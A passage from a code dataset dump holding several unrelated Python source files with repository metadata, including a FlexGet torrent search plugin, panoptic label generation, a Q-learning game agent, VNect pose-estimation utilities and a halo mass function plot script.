in config file\")\n exit(1)\n\n return params\n","repo_name":"Sylelil/Bioinformatics_project","sub_path":"src/genes/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":7645,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"906203473","text":"from __future__ import unicode_literals, division, absolute_import\nfrom builtins import * # noqa pylint: disable=unused-import, redefined-builtin\n\nimport logging\n\nfrom flexget import plugin\nfrom flexget.entry import Entry\nfrom flexget.event import event\nfrom flexget.utils.requests import RequestException\nfrom flexget.utils.soup import get_soup\nfrom flexget.utils.search import torrent_availability, clean_symbols\nfrom flexget.utils.tools import parse_filesize\n\nlog = logging.getLogger('limetorrents')\n\nclass Limetorrents(object):\n \"\"\"\n Limetorrents search plugin.\n \"\"\"\n\n schema = {\n 'oneOf': [\n {'type': 'boolean'},\n {\n 'type': 'object',\n 'properties': {\n 'category': {'type': 'string', 'enum': ['all', 'anime', 'applications', 'games', 'movies', 'music',\n 'tv', 'other'], 'default': 'all'},\n 'order_by': {'type': 'string', 'enum': ['date', 'seeds'], 'default': 'date'}\n },\n 'additionalProperties': False\n }\n ]\n }\n\n base_url = 'https://www.limetorrents.cc/'\n errors = False\n\n @plugin.internet(log)\n def search(self, task, entry, config):\n \"\"\"\n Search for entries on Limetorrents\n \"\"\"\n\n if not isinstance(config, dict):\n config = {'category': config}\n\n order_by = ''\n if isinstance(config.get('order_by'), str):\n if config['order_by'] != 'date':\n order_by = '{0}/1'.format(config['order_by'])\n\n category = 'all'\n if isinstance(config.get('category'), str):\n category = '{0}'.format(config['category'])\n\n entries = set()\n\n for search_string in entry.get('search_strings', [entry['title']]):\n # No special characters - use dashes instead of %20\n cleaned_search_string = clean_symbols(search_string).replace(' ', '-')\n\n query = 'search/{0}/{1}/{2}'.format(category, cleaned_search_string.encode('utf8'), order_by)\n log.debug('Using search: %s; category: %s; ordering: %s', cleaned_search_string, category, order_by or 'default')\n try:\n page = task.requests.get(self.base_url + query)\n log.debug('requesting: %s', page.url)\n except RequestException as e:\n log.error('Limetorrents request failed: %s', e)\n continue\n\n soup = get_soup(page.content)\n if soup.find('a', attrs={'class': 'csprite_dl14'}) is not None:\n for link in soup.findAll('a', attrs={'class': 'csprite_dl14'}):\n\n row = link.find_parent('tr')\n info_url = str(link.get('href'))\n\n # Get the title from the URL as it's complete versus the actual Title text which gets cut off\n title = str(link.next_sibling.get('href'))\n title = title[:title.rfind('-torrent')].replace('-', ' ')\n title = title[1:]\n\n data = row.findAll('td', attrs={'class': 'tdnormal'})\n size = str(data[1].text).replace(',', '')\n\n seeds = int(row.find('td', attrs={'class': 'tdseed'}).text.replace(',', ''))\n leeches = int(row.find('td', attrs={'class': 'tdleech'}).text.replace(',', ''))\n\n size = parse_filesize(size)\n\n e = Entry()\n\n e['url'] = info_url\n e['title'] = title\n e['torrent_seeds'] = seeds\n e['torrent_leeches'] = leeches\n e['search_sort'] = torrent_availability(e['torrent_seeds'], e['torrent_leeches'])\n e['content_size'] = size\n\n entries.add(e)\n\n return entries\n\n\n@event('plugin.register')\ndef register_plugin():\n plugin.register(Limetorrents, 'limetorrents', 
interfaces=['search'], api_ver=2)\n","repo_name":"bragatrosco/flexget","sub_path":"lib/python2.7/site-packages/flexget/plugins/sites/limetorrents.py","file_name":"limetorrents.py","file_ext":"py","file_size_in_byte":4028,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"18334815693","text":"import datetime\nimport json\nimport os, sys\nimport os.path as osp\nfrom PIL import Image\nimport numpy as np\nsys.path.append('../')\nfrom city_default import CATEGORIES, INFO, LICENSES\nimport argparse\nimport shutil\nimport time\nimport multiprocessing\n\nparser = argparse.ArgumentParser()\nparser.add_argument('--mode', type=str, default='val', help='train/val/test')\nparser.add_argument('--root_dir', type=str, default='data/city_ext/', help='root directory')\nargs = parser.parse_args()\n\nMODE = args.mode\nROOT_DIR = args.root_dir\nSEMANTIC_DIR = os.path.join(ROOT_DIR, MODE, 'cls')\nINSTANCE_DIR = os.path.join(ROOT_DIR, MODE, 'inst')\nLABELMAP_DIR = os.path.join(ROOT_DIR, MODE, 'labelmap')\nos.makedirs(LABELMAP_DIR, exist_ok=True)\nPANOPTIC_DIR = os.path.join(ROOT_DIR, MODE, 'panoptic_inst')\nos.makedirs(PANOPTIC_DIR, exist_ok=True)\n\n####\nVOID = 255\nID2CATINFO = {x['id']:x for x in CATEGORIES}\n\ndef panoptic_single_core(proc_id, sem_files, inst_files, id_converter, ori2fcn):\n for sem_file, inst_file in zip(sem_files, inst_files):\n pan_map, label_map = sem_inst2pan(sem_file, inst_file, id_converter, ori2fcn)\n Image.fromarray(pan_map).save(\n os.path.join(PANOPTIC_DIR, sem_file.split('/')[-1]))\n Image.fromarray(label_map).save(\n os.path.join(LABELMAP_DIR, sem_file.split('/')[-1]))\n\n# convert into Cityscapes-style instanceID maps\ndef sem_inst2pan(sem_file, inst_file, id_converter, ori2fcn):\n color_map = np.array(Image.open(sem_file), dtype=np.uint32)[:,:,:3] # 3 channel\n sem_map = color_map[:,:,0] + \\\n color_map[:,:,1]*256 + \\\n color_map[:,:,2]*256*256 # 1 channel\n \n inst_map = np.array(Image.open(inst_file))\n pan_map = np.ones((sem_map.shape[0], sem_map.shape[1]), dtype=np.uint32)*VOID\n label_map = np.ones((sem_map.shape[0], sem_map.shape[1]), dtype=np.uint8)*VOID\n\n sem_ids = np.unique(sem_map)\n inst_ids = np.unique(inst_map)\n\n # Stuff Classes \n for sem_id in sem_ids:\n if sem_id not in id_converter:\n continue\n fcn_id = id_converter[sem_id]\n mask = sem_map == sem_id\n label_map[mask] = fcn_id\n # Dont include Things classes in pan_map.\n if ID2CATINFO[fcn_id]['isthing'] == 1:\n continue\n pan_map[mask] = fcn_id\n\n # Things Classes\n for inst_id in inst_ids:\n #### if stuff classes < 1000, skip\n if inst_id < 1000:\n continue\n obj_mask = inst_map == inst_id\n sem_id, cnt = np.unique(sem_map[obj_mask], return_counts=True)\n sem_id = sem_id[np.argmax(cnt)]\n if sem_id not in id_converter:\n continue\n # Skip the stuff classes\n fcn_id = id_converter[sem_id]\n obj_id = inst_id % 1000 # NOTE: obj_id can be ZERO !\n # Filter Stuff classes\n if ID2CATINFO[fcn_id]['isthing'] == 0:\n continue\n pan_map[obj_mask] = fcn_id*1000 + obj_id\n\n return pan_map.astype(np.uint32), label_map.astype(np.uint8)\n\ndef panoptic_multi_core(sem_files, inst_files, id_converter, ori2fcn):\n cpu_num = multiprocessing.cpu_count()//2\n sem_split = np.array_split(list(sem_files), cpu_num)\n inst_split = np.array_split(list(inst_files), cpu_num)\n assert(len(sem_split) == len(inst_split))\n print(\"Number of cores: %d, images per core: %d\"%\n (cpu_num, len(sem_split[0])))\n workers = multiprocessing.Pool(processes=cpu_num)\n processes = 
[]\n\n for proc_id, (sem_part, inst_part) in enumerate(zip(sem_split, inst_split)):\n workers.apply_async(panoptic_single_core,\n (proc_id, sem_part, inst_part, id_converter, ori2fcn))\n workers.close()\n workers.join()\n\n\ndef main():\n \n id_converter = {x['color'][0]+x['color'][1]*256+x['color'][2]*256*256:x['id'] for x in CATEGORIES}\n ori2fcn = {x['ori_id'] : x['id'] for x in CATEGORIES}\n # panoptic video annotations\n start_pano = time.time()\n print('==> %s/labelmap/, %s/panoptic_inst/ ...'%(MODE, MODE)) \n # merge semantic segmentation and instance id map into panoptic format\n sem_files = [osp.join(SEMANTIC_DIR,x) for x in os.listdir(SEMANTIC_DIR) if '.png' in x]\n sem_files.sort()\n inst_files = [osp.join(INSTANCE_DIR,x) for x in os.listdir(INSTANCE_DIR) if '.png' in x]\n inst_files.sort()\n if not (len(sem_files) == len(inst_files)):\n raise ValueError('len semfiles != len inst_files')\n panoptic_multi_core(sem_files, inst_files, id_converter, ori2fcn) \n\nif __name__=='__main__':\n main()","repo_name":"mcahny/vps","sub_path":"prepare_data/create_panoptic_labels.py","file_name":"create_panoptic_labels.py","file_ext":"py","file_size_in_byte":4517,"program_lang":"python","lang":"en","doc_type":"code","stars":300,"dataset":"github-code","pt":"61"} +{"seq_id":"33623866476","text":"import cv2\nfrom enduro.agent import Agent\nfrom enduro.action import Action\nfrom enduro.state import EnvironmentState\nimport numpy as np\nfrom collections import defaultdict\nimport dill as pickle\n\n\nclass QAgent(Agent):\n def __init__(self, alpha = 0.01, gamma = 0.9, epsilon = 0.01):\n super(QAgent, self).__init__()\n\n self.total_reward = 0\n self.alpha = alpha\n self.gamma = gamma\n self.e = epsilon\n self.policy = defaultdict(lambda: Action.ACCELERATE)\n self.q = defaultdict(float)\n self.prev_state = None\n self.curr_state = None\n self.last_reward = None\n self.last_action = None\n\n def initialise(self, grid):\n \"\"\" Called at the beginning of an episode\n \"\"\"\n self.total_reward = 0\n self.prev_state = None\n self.curr_state = None\n self.sense(grid)\n self.last_reward = None\n self.last_action = None\n\n if not self.learning:\n cv2.imshow(\"Enduro\", self._image)\n cv2.imshow(\"Environment Grid\", EnvironmentState.draw(grid))\n with open('policy.p', 'rb') as handle:\n self.policy = pickle.load(handle)\n\n\n def act(self):\n\n if self.learning:\n action_val = {}\n\n for a in self.getActionsSet():\n action_val[a] = self.q[(self.curr_state, a)]\n a_max = max(action_val, key=action_val.get)\n\n self.policy[self.curr_state] = a_max\n action = np.random.choice([a_max, np.random.choice(self.getActionsSet())], p=[1-self.e, self.e])\n\n else:\n action = self.policy[self.curr_state]\n\n self.last_action = action\n self.last_reward = self.move(action)\n self.total_reward += self.last_reward\n\n def sense(self, grid):\n \"\"\" Constructs the next state from sensory signals.\n\n gird -- 2-dimensional numpy array containing the latest grid\n representation of the environment\n \"\"\"\n self.prev_state = self.curr_state\n\n position2 = np.where(grid == 2)\n x2 = position2[1][0]\n position1 = np.where(grid == 1)\n x1_1 = None\n y1_1 = None\n x1_2 = None\n y1_2 = None\n dist = None\n\n for x, y in zip(position1[1], position1[0]):\n if (dist is None) or abs(x - x2) + y < dist:\n x1_1 = x\n y1_1 = y\n dist = max(abs(x - x2) - 1, 0) + y\n\n x1_1 = -1 if x1_1 is None else -1 if dist > 9 or abs(x1_1 - x2) > 2 else x1_1\n dist = None\n for x, y in zip(position1[1], position1[0]):\n if (x != x1_1 or y != 
y1_1) and ((dist is None) or abs(x - x2) + y < dist):\n x1_2 = x\n y1_2 = y\n dist = max(abs(x - x2) - 1, 0) + y\n x1_2 = -1 if x1_2 is None else -1 if dist > 9 or abs(x1_2 - x2) > 2 else x1_2\n a = 100 if x1_1 == -1 else x2 - x1_1\n b = 100 if x1_2 == -1 else x2 - x1_2\n self.curr_state = (a, b, x2 >= 7, x2 <= 2)\n\n if not self.learning:\n # Visualise the environment grid\n cv2.imshow(\"Environment Grid\", EnvironmentState.draw(grid))\n\n def learn(self):\n \"\"\" Performs the learning procudre. It is called after act() and\n sense() so you have access to the latest tuple (s, s', a, r).\n \"\"\"\n vals = []\n for a in self.getActionsSet():\n vals.append(self.q[(self.curr_state, a)])\n val_max = max(vals)\n\n self.q[(self.prev_state, self.last_action)] = self.q[(self.prev_state, self.last_action)] + \\\n self.alpha * (self.last_reward + self.gamma * val_max - self.q[(self.prev_state, self.last_action)])\n\n\n def callback(self, episode, iteration):\n \"\"\" Called at the end of each timestep for reporting/debugging purposes.\n \"\"\"\n print(\"{0}/{1}: {2}\".format(episode, iteration, self.total_reward))\n # Show the game frame only if not learning\n if self.learning:\n if iteration == 6500:\n with open('policy.p', 'wb') as handle:\n pickle.dump(self.policy, handle, protocol=pickle.HIGHEST_PROTOCOL)\n else:\n cv2.imshow(\"Enduro\", self._image)\n cv2.waitKey(40)\n\nif __name__ == \"__main__\":\n a = QAgent()\n a.run(True, episodes=500, draw=False)\n print('Total reward: ' + str(a.total_reward))\n","repo_name":"hakobtam/q-learning","sub_path":"q_agent.py","file_name":"q_agent.py","file_ext":"py","file_size_in_byte":4399,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"34986687663","text":"import os\nimport shutil\n\ndef already_exists(to_folder,type=\"dir\",phase_flag=3):\n if type == \"dir\":\n if os.path.isdir(to_folder):\n if input(\"Caution! \"+ to_folder+\" directory already exists. still want to create? 
(y/n)\") != \"y\":\n print (\"directory not created.\")\n return True\n else:\n shutil.rmtree(to_folder)\n # In the third phase (phase_flag=3) folders need to be created for iTracker algorithm\n # in the first phase, folder for extracted images and eyes need to be created\n os.makedirs(to_folder,mode=0o744,exist_ok=True) #create folder for extracted images or eyes\n # or numbered folder for iTracker algorithm\n if (phase_flag==3):\n os.makedirs(to_folder+\"/tabFace\",mode=0o744,exist_ok=True) #create face folder within it\n os.makedirs(to_folder+\"/tabLeftEye\",mode=0o744,exist_ok=True) #create left eye folder within it\n os.makedirs(to_folder+\"/tabRightEye\",mode=0o744,exist_ok=True) #create right eye folder within it\n return False\n","repo_name":"rahulbishain/Preferential-Looking","sub_path":"code/checkExistence.py","file_name":"checkExistence.py","file_ext":"py","file_size_in_byte":1189,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"70842088834","text":"#!/usr/bin/env python3\n# -*- coding: UTF-8 -*-\n\n\nimport cv2\nimport math\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom mpl_toolkits import mplot3d\nfrom matplotlib.animation import FuncAnimation\n\n\ndef img_scale(img, scale):\n \"\"\"\n Resize a image by s scaler in both x and y directions.\n\n :param img: input image\n :param scale: scale factor, new image side length / raw image side length\n :return: the scaled image\n \"\"\"\n return cv2.resize(img, (0, 0), fx=scale, fy=scale, interpolation=cv2.INTER_LINEAR)\n\n\ndef hm_local_interp_bilinear(src, scale, center, area_size=10):\n \"\"\"\n Heatmap interpolation using a local bilinear method.\n Reference website: https://zhuanlan.zhihu.com/p/49832048\n\n :param src: input heatmap\n :param scale: scale factor, new image side length / raw image side length\n :param center: coordinate of the local center in the heatmap, [row, column]\n :param area_size: side length of local area in the interpolated heatmap\n :return: the destination heatmap with local area being interpolated\n \"\"\"\n src_h, src_w = src.shape[:]\n dst_h, dst_w = [s * scale for s in src.shape[:]]\n y, x = [c * scale for c in center]\n dst = np.zeros((dst_h, dst_w))\n for dst_y in range(max(y - area_size // 2, 0), min(y + int(np.ceil(area_size / 2)), dst_h)):\n for dst_x in range(max(x - area_size // 2, 0), min(x + int(np.ceil(area_size / 2)), dst_w)):\n # pixel alignment\n # src_x = dst_x / 8\n # src_y = dst_y / 8\n # center alignment\n src_x = (dst_x + 0.5) / scale - 0.5\n src_y = (dst_y + 0.5) / scale - 0.5\n src_x_0 = int(src_x)\n src_y_0 = int(src_y)\n src_x_1 = min(src_x_0 + 1, src_w - 1)\n src_y_1 = min(src_y_0 + 1, src_h - 1)\n\n value0 = (src_x_1 - src_x) * src[src_y_0, src_x_0] + (src_x - src_x_0) * src[src_y_0, src_x_1]\n value1 = (src_x_1 - src_x) * src[src_y_1, src_x_0] + (src_x - src_x_0) * src[src_y_1, src_x_1]\n dst[dst_y, dst_x] = (src_y_1 - src_y) * value0 + (src_y - src_y_0) * value1\n return dst\n\n\ndef hm_pt_interp_bilinear(src, scale, point):\n \"\"\"\n Determine the value of one desired point by bilinear interpolation.\n\n :param src: input heatmap\n :param scale: scale factor, input box side length / heatmap side length\n :param point: position of the desired point in input box, [row, column]\n :return: the value of the desired point\n \"\"\"\n src_h, src_w = src.shape[:]\n dst_y, dst_x = point\n src_x = (dst_x + 0.5) / scale - 0.5\n src_y = (dst_y + 0.5) / scale - 0.5\n src_x_0 = int(src_x)\n src_y_0 = int(src_y)\n 
src_x_1 = min(src_x_0 + 1, src_w - 1)\n src_y_1 = min(src_y_0 + 1, src_h - 1)\n\n value0 = (src_x_1 - src_x) * src[src_y_0, src_x_0] + (src_x - src_x_0) * src[src_y_0, src_x_1]\n value1 = (src_x_1 - src_x) * src[src_y_1, src_x_0] + (src_x - src_x_0) * src[src_y_1, src_x_1]\n dst_val = (src_y_1 - src_y) * value0 + (src_y - src_y_0) * value1\n return dst_val\n\n\ndef img_padding(img, box_size, color='black'):\n \"\"\"\n Given the input image and side length of the box, put the image into the center of the box.\n\n :param img: the input color image, whose longer side is equal to box size\n :param box_size: the side length of the square box\n :param color: indicating the padding area color\n :return: the padded image\n \"\"\"\n h, w = img.shape[:2]\n offset_x, offset_y = 0, 0\n if color == 'black':\n pad_color = [0, 0, 0]\n elif color == 'grey':\n pad_color = [128, 128, 128]\n img_padded = np.ones((box_size, box_size, 3), dtype=np.uint8) * np.array(pad_color, dtype=np.uint8)\n if h > w:\n offset_x = box_size // 2 - w // 2\n img_padded[:, offset_x: box_size // 2 + int(np.ceil(w / 2)), :] = img\n else: # h <= w\n offset_y = box_size // 2 - h // 2\n img_padded[offset_y: box_size // 2 + int(np.ceil(h / 2)), :, :] = img\n return img_padded, [offset_x, offset_y]\n\n\ndef img_scale_squarify(img, box_size):\n \"\"\"\n To scale and squarify the input image into a square box with fixed size.\n\n :param img: the input color image\n :param box_size: the length of the square box\n :return: box image, scaler and offsets\n \"\"\"\n h, w = img.shape[:2]\n scaler = box_size / max(h, w)\n img_scaled = img_scale(img, scaler)\n img_padded, [offset_x, offset_y] = img_padding(img_scaled, box_size)\n assert img_padded.shape == (box_size, box_size, 3), 'padded image shape invalid'\n return img_padded, scaler, [offset_x, offset_y]\n\n\ndef img_scale_padding(img, scaler, box_size, color='black'):\n \"\"\"\n For a box image, scale down it and then pad the former area.\n\n :param img: the input box image\n :param scaler: scale factor, new image side length / raw image side length, < 1\n :param box_size: side length of the square box\n :param color: the padding area color\n \"\"\"\n img_scaled = img_scale(img, scaler)\n if color == 'black':\n pad_color = (0, 0, 0)\n elif color == 'grey':\n pad_color = (128, 128, 128)\n pad_h = (box_size - img_scaled.shape[0]) // 2\n pad_w = (box_size - img_scaled.shape[1]) // 2\n pad_h_offset = (box_size - img_scaled.shape[0]) % 2\n pad_w_offset = (box_size - img_scaled.shape[1]) % 2\n img_scale_padded = np.pad(img_scaled,\n ((pad_w, pad_w + pad_w_offset),\n (pad_h, pad_h + pad_h_offset),\n (0, 0)),\n mode='constant',\n constant_values=(\n (pad_color[0], pad_color[0]),\n (pad_color[1], pad_color[1]),\n (pad_color[2], pad_color[2])))\n return img_scale_padded\n\n\ndef extract_2d_joints(heatmaps, box_size, hm_factor):\n \"\"\"\n Rescale the heatmap to input box size, then extract the coordinates for every joint.\n\n :param heatmaps: the input heatmaps\n :param box_size: the side length of the input box\n :param hm_factor: heatmap factor, indicating box size / heatmap size\n :return: a 2D array with [joints_num, 2], each row of which means [row, column] coordinates of corresponding joint\n \"\"\"\n joints_2d = np.zeros((heatmaps.shape[2], 2))\n for joint_num in range(heatmaps.shape[2]):\n # joint_coord_1 = np.unravel_index(np.argmax(heatmaps[:, :, joint_num]),\n # (box_size // hm_factor, box_size // hm_factor))\n # heatmap_scaled = hm_local_interp_bilinear(heatmaps[:, :, joint_num], 
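`extract_2d_joints` reads each joint's position off a (rescaled) heatmap with a 2-D argmax via `np.unravel_index`. A tiny standalone sketch of that pattern:

```python
import numpy as np

def argmax_2d(heatmap):
    """Return the (row, col) of the maximum of a 2-D heatmap."""
    return np.unravel_index(np.argmax(heatmap), heatmap.shape)

hm = np.zeros((46, 46))
hm[12, 30] = 1.0
assert argmax_2d(hm) == (12, 30)
```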
hm_factor, joint_coord_1)\n # joint_coord_2 = np.unravel_index(np.argmax(heatmap_scaled), (box_size, box_size))\n # joints_2d[joint_num, :] = joint_coord_2\n heatmap_scaled = cv2.resize(heatmaps[:, :, joint_num], (0, 0), \n fx=hm_factor, fy=hm_factor, \n interpolation=cv2.INTER_LINEAR)\n joint_coord = np.unravel_index(np.argmax(heatmap_scaled), \n (box_size, box_size))\n joints_2d[joint_num, :] = joint_coord\n return joints_2d\n\n\ndef extract_3d_joints(joints_2d, x_hm, y_hm, z_hm, hm_factor):\n \"\"\"\n Extract 3D coordinates of each joint according to its 2D coordinates.\n\n :param joints_2d: 2D array with [joints_num, 2], containing 2D coordinates the joints\n :param x_hm: x coordinate heatmaps\n :param y_hm: y coordinate heatmaps\n :param z_hm: z coordinate heatmaps\n :param hm_factor: heatmap factor, indicating box size / heatmap size\n :return: a 3D array with [joints_num, 3], each row of which contains [x, y, z] coordinates of corresponding joint\n\n Notation:\n x direction: left --> right\n y direction: up --> down\n z direction: nearer --> farther\n \"\"\"\n scaler = 100 # scaler=100 -> mm unit; scaler=10 -> cm unit\n joints_3d = np.zeros((x_hm.shape[2], 3), dtype=np.float32)\n for joint_num in range(x_hm.shape[2]):\n # coord_2d_h, coord_2d_w = joints_2d[joint_num][:]\n # coord_3d_h = coord_2d_h\n # coord_3d_w = coord_2d_w\n # x_hm_scaled = img_scale(x_hm, hm_factor)\n # y_hm_scaled = img_scale(y_hm, hm_factor)\n # z_hm_scaled = img_scale(z_hm, hm_factor)\n # joint_x = x_hm_scaled[coord_3d_h, coord_3d_w, joint_num] * scaler\n # joint_y = y_hm_scaled[coord_3d_h, coord_3d_w, joint_num] * scaler\n # joint_z = z_hm_scaled[coord_3d_h, coord_3d_w, joint_num] * scaler\n y_2d, x_2d = joints_2d[joint_num][:]\n joint_x = hm_pt_interp_bilinear(x_hm[:, :, joint_num], \n hm_factor,\n (y_2d, x_2d)) * scaler\n joint_y = hm_pt_interp_bilinear(y_hm[:, :, joint_num], \n hm_factor,\n (y_2d, x_2d)) * scaler\n joint_z = hm_pt_interp_bilinear(z_hm[:, :, joint_num], \n hm_factor,\n (y_2d, x_2d)) * scaler\n joints_3d[joint_num, :] = [joint_x, joint_y, joint_z]\n # Subtract the root location to normalize the data\n joints_3d -= joints_3d[14, :]\n return joints_3d\n\n\ndef draw_limbs_2d(img, joints_2d, limb_parents, rect):\n # draw skeleton\n for limb_num in range(len(limb_parents)):\n x1 = joints_2d[limb_num, 0]\n y1 = joints_2d[limb_num, 1]\n x2 = joints_2d[limb_parents[limb_num], 0]\n y2 = joints_2d[limb_parents[limb_num], 1]\n length = ((x1 - x2) ** 2 + (y1 - y2) ** 2) ** 0.5\n deg = math.degrees(math.atan2(x1 - x2, y1 - y2))\n # here round() returns float type, so use int() to convert it to integer type\n polygon = cv2.ellipse2Poly((int(round((y1+y2)/2)), int(round((x1+x2)/2))),\n (int(length/2), 3),\n int(deg),\n 0, 360, 1)\n img = cv2.fillConvexPoly(img, polygon, color=(49, 22, 122))\n # draw rectangle\n x, y, w, h = rect\n pt1 = (x, y)\n pt2 = (x + w, y + h)\n cv2.rectangle(img, pt1, pt2, (60, 66, 207), 4)\n\n return img\n\n\ndef draw_limbs_3d(joints_3d, joint_parents):\n fig = plt.figure()\n ax_3d = plt.axes(projection='3d')\n ax_3d.clear()\n ax_3d.view_init(-90, -90)\n ax_3d.set_xlim(-500, 500)\n ax_3d.set_ylim(-500, 500)\n ax_3d.set_zlim(-500, 500)\n ax_3d.set_xticks([])\n ax_3d.set_yticks([])\n ax_3d.set_zticks([])\n white = (1.0, 1.0, 1.0, 0.0)\n ax_3d.w_xaxis.set_pane_color(white)\n ax_3d.w_yaxis.set_pane_color(white)\n ax_3d.w_xaxis.line.set_color(white)\n ax_3d.w_yaxis.line.set_color(white)\n ax_3d.w_zaxis.line.set_color(white)\n for i in range(joints_3d.shape[0]):\n x_pair = [joints_3d[i, 
0], joints_3d[joint_parents[i], 0]]\n y_pair = [joints_3d[i, 1], joints_3d[joint_parents[i], 1]]\n z_pair = [joints_3d[i, 2], joints_3d[joint_parents[i], 2]]\n ax_3d.plot(x_pair, y_pair, zs=z_pair, linewidth=3)\n plt.ion()\n plt.show()\n\n\nclass PoseAnimation3d:\n def __init__(self, ax, joint_parents):\n self.joint_parents = joint_parents\n self.ax = ax\n self.ax.view_init(-90, -90)\n self.ax.set_xlim(-500, 500)\n self.ax.set_ylim(-500, 500)\n self.ax.set_zlim(-500, 500)\n self.ax.set_xticks([])\n self.ax.set_yticks([])\n self.ax.set_zticks([])\n white_color = (1.0, 1.0, 1.0, 0.0)\n self.ax.w_xaxis.set_pane_color(white_color)\n self.ax.w_yaxis.set_pane_color(white_color)\n self.ax.w_xaxis.line.set_color(white_color)\n self.ax.w_yaxis.line.set_color(white_color)\n self.ax.w_zaxis.line.set_color(white_color)\n self.skeletons = [self.ax.plot([], [], [], '-', linewidth=3)[0] for _ in range(21)]\n\n def ani_init(self):\n for skeleton in self.skeletons:\n skeleton.set_data(np.array([]), np.array([]))\n skeleton.set_3d_properties(np.array([]))\n return self.skeletons\n\n def __call__(self, joints_3d):\n for i, skeleton in enumerate(self.skeletons):\n x_pair = np.array([joints_3d[i, 0], joints_3d[self.joint_parents[i], 0]])\n y_pair = np.array([joints_3d[i, 1], joints_3d[self.joint_parents[i], 1]])\n z_pair = np.array([joints_3d[i, 2], joints_3d[self.joint_parents[i], 2]])\n skeleton.set_data(x_pair, y_pair)\n skeleton.set_3d_properties(z_pair)\n return self.skeletons\n\n\ndef plot_3d_init(joint_parents, joints_iter_gen):\n fig = plt.figure()\n ax = plt.axes(projection='3d')\n ani_update = PoseAnimation3d(ax, joint_parents)\n global ani\n ani = FuncAnimation(fig, ani_update, frames=joints_iter_gen, init_func=ani_update.ani_init, interval=20, blit=True)\n plt.ion()\n plt.show()\n\n\ndef plot_3d(q_start3d, q_joints, joint_parents):\n q_start3d.get()\n\n def joints_iter_gen_inner():\n while 1:\n yield q_joints.get(True)\n\n fig = plt.figure()\n ax = plt.axes(projection='3d')\n ani_update = PoseAnimation3d(ax, joint_parents)\n global ani\n ani = FuncAnimation(fig, ani_update, frames=joints_iter_gen_inner, init_func=ani_update.ani_init, interval=15,\n blit=True)\n plt.show()\n\n\ndef gen_heatmap(img_shape, center, sigma=3):\n img_height, img_width = img_shape\n heatmap = np.zeros((img_height, img_width), dtype=np.float32)\n center_x, center_y = center\n th = 4.6052\n delta = math.sqrt(th * 2)\n x0 = int(max(0, center_x - delta * sigma))\n y0 = int(max(0, center_y - delta * sigma))\n x1 = int(min(img_width, center_x + delta * sigma))\n y1 = int(min(img_height, center_y + delta * sigma))\n for y in range(y0, y1):\n for x in range(x0, x1):\n d = (x - center_x) ** 2 + (y - center_y) ** 2\n exp = d / 2.0 / sigma / sigma\n if exp > th:\n continue\n # heatmap[y][x] = np.clip(heatmap[y][x], math.exp(-exp), 1.0)\n heatmap[y, x] = math.exp(-exp)\n return heatmap\n","repo_name":"XinArkh/VNect","sub_path":"src/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":14150,"program_lang":"python","lang":"en","doc_type":"code","stars":236,"dataset":"github-code","pt":"61"} +{"seq_id":"72567690754","text":"import os, sys\nimport numpy as np\nimport h5py as h5\nimport matplotlib.pyplot as plt\n\ncosmo_dir = '/home/bruno/Desktop/Dropbox/Developer/cosmo_sims/'\ntoolsDirectory = cosmo_dir + \"tools/\"\nsys.path.append( toolsDirectory )\nfrom halo_finder import find_halos\nfrom plot_halos import plot_halos_positions\nfrom load_halo_catalogs import load_asciiFiles\nfrom mass_function import 
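`gen_heatmap` above builds a truncated Gaussian with a double Python loop over a bounding box. A vectorized equivalent as a sketch: it reproduces the same `exp > th` cutoff everywhere, and pixels outside the original bounding box exceed the threshold anyway, so they come out zero in both versions:

```python
import numpy as np

def gen_heatmap_vectorized(img_shape, center, sigma=3, th=4.6052):
    """Truncated Gaussian heatmap equivalent to the double loop, without Python-level loops."""
    h, w = img_shape
    cx, cy = center
    ys, xs = np.mgrid[0:h, 0:w]
    exp = ((xs - cx) ** 2 + (ys - cy) ** 2) / (2.0 * sigma * sigma)
    return np.where(exp > th, 0.0, np.exp(-exp)).astype(np.float32)

print(gen_heatmap_vectorized((46, 46), (30, 12)).max())  # 1.0 at the center
```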
get_mass_function\n\n\ndataDir = '/home/bruno/Desktop/data/'\ninDir = dataDir + 'cosmo_sims/cholla_pm/cosmo_256_dm/'\nhalos_dir = inDir + 'halos/'\noutDir = inDir\n\nsnapshots = [19]\n# Load Rockstar Catalogs\nrks_data_all = load_asciiFiles( snapshots, 8, halos_dir )\n\nLbox = 115e3\nn_slice = 64\nnSnap = 19\n\nfile_name = 'mass_function_{0}.png'.format(nSnap)\ncumulative = True\n\nfig = plt.figure(0)\nplt.clf()\nax = plt.gca()\n\n# # for nSnap in range(19, 20):\n# print \"n_nSnap: \", nSnap\n# inFileName = 'data/particles_{0}_1.h5'.format(nSnap)\n# inFile = h5.File( inDir + inFileName )\n# dens = inFile['density'][...]\n# inFile.close()\n# \n# dens = dens[:n_slice,:,:]\n# \n# halo_limit = dens.mean() * 172\n# dens_limit = dens.mean() * 1\n# halo_catalog = find_halos( Lbox, dens, dens_limit, halo_limit )\n# h_mass = halo_catalog[:,2]\n# pos_x = halo_catalog[:,4]\n# pos_y = halo_catalog[:,5]\n# pos_z = halo_catalog[:,6]\n# plot_halos_positions( Lbox, halo_catalog, dens, outDir, nSnap )\n# binCenters, massFunction = get_mass_function(h_mass, 1, comulative=cumulative, nBins=40)\n# ax.plot( binCenters, massFunction )\n\nrks_data = rks_data_all[nSnap]\nh_mass = rks_data['mvir']\nbinCenters, massFunction = get_mass_function(h_mass, 1, comulative=cumulative, nBins=40)\nax.plot( binCenters, massFunction, label='Rockstar')\n\n\nax.set_xlabel(r'Mass $[{\\rm h^{-1} M_{\\odot}}]$', fontsize=15 )\nif cumulative: ax.set_ylabel(r'n(>M) $[h^3{\\rm Mpc^{-3}}]$', fontsize=15 )\nelse: ax.set_ylabel(r'n $[h^3{\\rm Mpc^{-3}}]$', fontsize=15 )\nax.legend( loc=1, prop={'size':13} )\nax.set_title('Cumulative Halo Mass function z=0', fontsize=15)\nax.set_xscale('log')\nax.set_yscale('log')\nfig.savefig(outDir + file_name, 